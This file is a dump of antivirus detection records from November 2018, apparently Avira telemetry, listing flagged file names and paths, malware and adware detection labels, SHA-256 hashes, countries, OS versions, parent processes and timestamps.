  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212457-608488c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01434177\\AVSCAN-20181104-210731-0BCFB3D0\\AVSCAN-20181104-212457-608488C3', filesize=1280000, name='TR/KBDMai.osieo.#M1.#R1'), hash='14ec18fb32c8b2e34cde9b71d67c5b456ed28f9d8b63d5d343ea085e1e21977b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxac890.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaC88F.tmp\\dxaC890.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bcdb22a50ca896778dba8a96e0ab52a2a3404917', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\bcdb22a50ca896778dba8a96e0ab52a2a3404917', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='c974a6f95484b7161226a6bd8b7c4e298ea455b6ff7139dd8181183d491e0172', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:15:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200105-b9caf191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4789539\\AVSCAN-20181104-194328-203F8B01\\AVSCAN-20181104-200105-B9CAF191', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:01:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104818-c75d8c2d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-104759-C352569D\\AVSCAN-20181104-104818-C75D8C2D', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:47:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-134739-78653671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39c9d05c\\AVSCAN-20181102-134725-75DDFF02\\AVSCAN-20181102-134739-78653671', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='btav.exe', filepath='c:\\users\\X\\appdata\\roaming\\btav.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Ofiice 2013\\Office  啟用工具\\Microsoft Toolkit.exe', parentsize=38179840, timestamp='2018-11-02T16:01:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vm.exe', filepath='c:\\users\\X\\appdata\\roaming\\vm.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cbgqzynn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\cbGqZynN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081058-1a52cf19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081058-1A52CF19', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:10:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052546-db0dd7e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-052546-DB0DD7E5', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T09:00:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\COMMON\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='be4748d43383ada83ccfa0f7754d4361a5cdc7fc417515266fa4408021035193', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b773f75080c8c5f88a7620c147345e9f1832c87a3ee29e11eaa290ce0ca3f826', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\B773F75080C8C5F88A7620C147345E9F1832C87A3EE29E11EAA290CE0CA3F826', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b773f75080c8c5f88a7620c147345e9f1832c87a3ee29e11eaa290ce0ca3f826', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='high tv chanelle.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\high tv chanelle.exe', filesize=768000, name='TR/Dldr.Zampol.sgcmb.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085010-bf079740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-085010-BF079740', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083816-5da303cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-083816-5DA303CB', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110253-bf56a15d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110253-BF56A15D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recoverytoolbox.exe', filepath='G:\\LV2017\\RecoveryToolbox.exe', filesize=44864000, name='TR/AVKiller.twazw.#M1.#R1'), hash='b36c48f3568b5b6b37bde33c5c911e82b52c8d5f47e9b41b1203185711ae112e', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T01:48:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061648-103b7ad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-061648-103B7AD8', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='H:\\HBCD\\Programs\\BLANKANDSECURE.EXE', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='C:\\Program Files (x86)\\epsilon net\\Taxsystem\\patch.exe', filesize=167712000, name='TR/Dropper.Gen.#M300.#R3538'), hash='8c230a8f2554c5627b462627d43cda7418599e7b0b93b83f6e8e03975cf519cf', metadata=Row(cmdline='true', country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\epsilon net\\Taxsystem\\Updater.exe', parentsize=1047680, timestamp='2018-11-02T13:02:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='microsoft office 2016 activator (updated).exe', filepath='C:\\Users\\X\\Desktop\\Microsoft Office 2016 Activator (Updated).exe', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='e53898153ce873b2ad5777a9d89306ebf3b25a0ebd5e0e0b2df2984810f7045c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:51:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085243-eb02a1b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-085243-EB02A1B3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:53:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T17:51:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st6.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST6\\ST6.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='daae94b24cc0953acc0981f8c6ffb0e3b439c394f41f3a31e19f5cf11b05b7c2', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181031-002525-fdbc85dd', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-002341-F68CAF70\\AVSCAN-20181031-002525-FDBC85DD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:41:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.kjvwd.#M0.#R0'), hash='e6fc333e96f2bf01b233da4c04eb648168ec1f8b12f53c11b61c24579404b6c8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131451-48640575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-131151-33810FE0\\AVSCAN-20181102-131451-48640575', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:12:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9B37CB2CF2DA005513BB4A073CC0E715D7F2BB286CCADFF0BDD82BB523B83294', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081540-98dee392', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ddde63ce\\AVSCAN-20181102-080730-4BDAEC03\\AVSCAN-20181102-081540-98DEE392', filesize=472000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d038f2dc1801bb7cfbd94c9b0e44156d89adee768e8f803e4637c8ff8d793827', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:45:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142127-9a860aa2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b067a3ed\\AVSCAN-20181102-142034-919E3EAF\\AVSCAN-20181102-142127-9A860AA2', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-27-014531/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202959-fb4415a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202959-FB4415A5', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:29:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (7).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (7).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cb08', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cb08', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:38:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091306-fb4b3d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091306-FB4B3D63', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:12:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='fb41ab85b19b1cb4e15a36676a7da2963928e51e4152078a0d20e8a4dc4d33b6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T13:04:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293033', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293033', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:22:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:16:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsr5B54.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111130-aa5c8723', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111130-AA5C8723', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:21:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-071613-5d5e75ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b3b6281\\AVSCAN-20181104-071402-4FAE512B\\AVSCAN-20181104-071613-5D5E75AB', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:16:13Z'), dt=datetime.date(2018, 11, 4)),
